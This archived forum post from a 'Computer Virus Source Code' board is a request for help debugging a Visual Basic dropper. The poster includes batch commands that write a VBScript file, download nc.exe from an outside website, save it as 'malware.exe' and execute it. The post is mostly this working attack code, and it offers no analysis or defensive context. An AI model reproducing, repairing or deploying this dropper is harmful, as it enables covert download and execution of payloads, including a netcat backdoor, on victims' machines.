Talk About Network

Google


Register and Login
Nick
Password
Register create new account Sign up is FREE and you can post replies, new topics, bookmark posts and more!
Recover lost password


Computing > Computer Virus Source Code > Can anyone help...
Latest [ Topics | Posts ] Archive Post A New Topic Post a Reply
<< Topic < Post Post 1 of 2 Topic 577 of 604
Post > Topic >>

Can anyone help me creating a Dropper, VB Code???

by NEO <nikola66@[EMAIL PROTECTED] > Sep 28, 2007 at 12:15 PM

My code in VB is not working ,although i think i wrote everthin
correctly........
What's the problem ???? can anyone help???
-----------------------------------------------------------------------------------------------
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>hacksafe.vbs
echo HTTPGET.Open "GET", "http://www.hacksafe.com.au/nc.exe",
False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile "malware.exe", adSaveCreateOverWrite
>>hacksafe.vbs
hacksafe.vbs
malware.exe -h
-----------------------------------------------------------------------------------------------
 




 2 Posts in Topic:
Can anyone help me creating a Dropper, VB Code???
NEO <nikola66@[EMAIL P  2007-09-28 12:15:32 
Re: Can anyone help me creating a Dropper, VB Code???
NEO <nikola66@[EMAIL P  2007-09-29 17:39:31 

Post A Reply:
  Go here to Signup

AddThis Feed Button


About - Advertising - Contact - Frequently Asked Questions - Privacy Policy - Terms of Use - Signup

Contact
tan12V112 Sun Sep 7 3:07:58 CDT 2008.